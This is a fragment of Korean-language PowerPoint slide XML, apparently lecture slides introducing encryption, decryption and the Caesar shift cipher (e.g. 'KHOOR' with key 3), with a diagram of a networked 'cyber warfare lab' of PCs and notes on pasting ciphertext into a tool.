            <a:ext cx="74676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0621DB74-C5C5-45D7-94E3-2096FB042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825" y="4199482"/>
            <a:ext cx="2854030" cy="120362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직선 연결선 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BC2726C-35D9-4E37-AB8D-49FC6A277CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2676787" y="2486258"/>
            <a:ext cx="0" cy="328982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08CABBC-A2B1-4C69-B775-B0FF45CDFD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210190" y="2564004"/>
            <a:ext cx="1272207" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호화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sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64BD5B46-2EBE-4296-926F-B1C58B1F2182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210190" y="4240884"/>
            <a:ext cx="1272207" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>복호화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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="직선 연결선 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76A8C4ED-FA3F-4D86-A278-63F71E33ADD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790492" y="3887840"/>
            <a:ext cx="10899583"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5A13EE6-A0F0-4B46-8D5B-8063D5D88F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4325510" y="6123543"/>
            <a:ext cx="3371352"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KHOOR   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>( key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: 3 )</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dirty="0"/>
              <a:t>평문으로 사용되는 알파벳을 일정한 문자 수 만큼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>평행이동</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="그룹 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DDA3978-5F82-4909-A5A6-2E7577923EFD}"/>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E8053A7-D0CF-45D2-95FD-77250F67112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B465C911-C705-49E3-BECF-35800C2917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5" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE840658-A667-4591-9704-05760A3323F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58277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a:t>카이사르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83C859F-4679-4F41-81E4-4619151BD311}"/>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41B2ADB4-A20C-4DB6-BA32-1D2F701E51A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B6992D03-918D-4C56-9BFF-4551E039B0B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9A4508D9-2773-4F30-B65F-DF280C87AF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44FCD52B-66EE-4E35-BC3A-B14AF08CC4F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실행 단추: 문서 33">
            <a:hlinkClick r:id="rId8" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0D57D3-7913-4FAC-829A-BD9E2F38A6D8}"/>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6306208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5A1716A7-D52B-4418-809F-03E42E93D979}"/>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2B9B7E8-7FE7-4552-B3C4-890F69F6B8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E3CE64E-598B-4F39-9D34-3336FA8A764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1F71078-63CA-4C03-8329-A0F11B7B40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E6AECC6-AF7A-4C46-8D63-ED8E1E87A18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51884793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a:t>Ciphertext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>부분에 암호문을 복사 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>붙혀넣기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>한후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>엔터를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 친다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0F1D7DB4-BCCA-4BEA-8ED5-BFDFB3699D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479208" y="734600"/>
            <a:ext cx="5428611" cy="1003200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462CFA8D-6B6B-415C-B96A-26A1A5D4CDF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EF4A2EB7-4F13-4ABA-B0C2-B70505938D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727F417-B194-4995-A062-AE526CD8897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0A85B5-42CA-4DF9-BDDE-5377F8F83F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05498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4B997D5-5FC5-459C-9FA9-06E2928A752F}"/>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71E77BAF-4ECD-4596-849B-DD346F23EB9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2F9618C4-5F4C-4728-A724-9A44FC6C6A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1DDA6112-315A-4A14-BFDD-66524E41710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67329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1</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key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>=3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파이썬 기본 문법을 작성할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98B08CB-BE7B-4E3F-B3F9-C71913BF7F06}"/>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6282C3FA-33D3-4CF3-BEE7-4C9EA2FF3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E695A1D-A3D3-439B-B811-C882760CE95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587568FE-9993-4AC7-AA93-3458B61A8AB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5" name="화살표: 오른쪽 34">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79ED9CC-DAC6-4D87-A036-9EBC09DFDBA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40463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직사각형 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3411BAE-D387-4D60-A2F8-C24262A209F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7559610" y="4207925"/>
            <a:ext cx="1890406" cy="1263553"/>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 name="직사각형 210">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32EA86D8-4E55-469F-B74D-2A3082EBA5F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3673665" y="2342463"/>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0" name="직사각형 209">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EB967AA-AAF0-4365-BF5F-F91566841302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632490" y="2376580"/>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 name="직사각형 208">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A54C0A-CDBD-47DD-866E-FEBC1C5F7AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3591315" y="2418224"/>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9" name="직사각형 1048">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C42F1D1-A526-49D4-A3E1-CBEAC297DFD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3545409" y="2457686"/>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199" y="400374"/>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kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>비대면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 수업</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격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1870B9A7-67FB-4633-B16B-4C6121042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 name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C243831C-CCED-4624-92B0-30413D52F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 name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3DBCE3D-038F-4313-B2CD-894935DB4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1" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30653281-FD19-482F-9E78-ADBBB109A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2" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BFE0D1E-C939-4266-A2FC-CEAE660A5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3" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A290837B-894D-4427-8908-25ADC087A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4" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AF3C39E-3F5C-4CF9-BDD5-E3A525550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5" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F255358-2FC9-4A26-9EB2-3F15E0E93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6" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C994ACE-0367-4266-B1A3-945E7CBD4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7" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6470E3D-C2C7-4636-8E22-E62E2A05A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8" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532400BB-27E6-432B-B475-C73E1F938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9" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74037588-0DA4-4996-BEB6-915A7D7D3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2" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04AE7A01-5A54-4FE0-B416-84FCA9BC4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3" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AAC1297-811D-4E73-8BE0-EB604E4A1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4" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99FD480-903B-4A69-B3C3-A3073A38D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5" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AE2B13E-4195-42E3-A0A3-2C7442E50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6" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2A1BA0C-5663-40FF-9876-4B999430D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7" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D743EF7C-64B3-4FB7-B35B-EA7B873C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0" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF4B45EF-2AB1-4A4B-8444-50CEBA75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2" name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8565F60-1FA0-4D97-B331-487DD48D7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9" name="연결선: 꺾임 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0A182AE-0F92-46F0-873F-7D2CE3C0F3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="1026" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1968694" y="3593728"/>
            <a:ext cx="490994" cy="4047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id="{171141DB-19CD-40CB-B78C-A8992C787942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="29" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2373400" y="3593795"/>
            <a:ext cx="490994" cy="40463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E988029D-CE79-40D4-B1E9-8E3C811FC49A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2778107" y="3189088"/>
            <a:ext cx="490994" cy="121405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DD3996AC-62D9-4892-969F-DD81D9B591AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3182814" y="2784381"/>
            <a:ext cx="490994" cy="202346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CFE981E3-5A11-45C4-A540-E4272A884E8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3589855" y="2377341"/>
            <a:ext cx="490994" cy="2837548"/>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067D4DFC-03B7-4E9F-A3C5-6D8716AFA9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1026" idx="2"/>
            <a:endCxn id="33" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011803"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02D21BA7-FEC7-4CEA-ABAE-BC965AFA0C3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821217"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E1B36E02-FBED-4833-A691-6BBDB80EE761}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="2"/>
            <a:endCxn id="35" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630631"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D092049C-FEB2-463E-BFBF-0C5D4F2C7C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="36" idx="0"/>
            <a:endCxn id="31" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4440045"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54CA44FA-EA07-4288-8010-DAE930860227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
            <a:endCxn id="37" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254126"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DB1DCA20-A9A1-4055-BEEA-4A98B5FFCC2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="38" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011803"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80601D3E-2E99-46BC-B28D-3586DCB95BC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="39" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821217"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B572B435-C779-4E8D-912F-64227CE9FE2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="42" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630631"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60FEF451-FF11-4894-A503-C1BBB0983A44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4440045"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EBFC1452-6237-4736-8584-1038A6DFEDC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="44" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254126"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96774D60-2265-4C11-9680-EC1F7D016FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="38" idx="2"/>
            <a:endCxn id="45" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011803"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id="{A6FF0022-EDD7-4120-880B-D9389BB6FAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="39" idx="2"/>
            <a:endCxn id="46" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821217"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7A42C1D1-4E05-46B4-A825-5DC834B96833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="42" idx="2"/>
            <a:endCxn id="47" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3630631"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7DF946AA-36CE-45CA-AD42-E05CD77F587B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="43" idx="2"/>
            <a:endCxn id="50" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4440045"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3A15B2A7-3EC3-4415-8118-61617C1FCCE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="44" idx="2"/>
            <a:endCxn id="52" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254126"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B3F5DA4E-E589-44C0-9AFF-4FCD5EC5543A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511792" y="2081652"/>
            <a:ext cx="2066517" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>사이버전 실습실</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
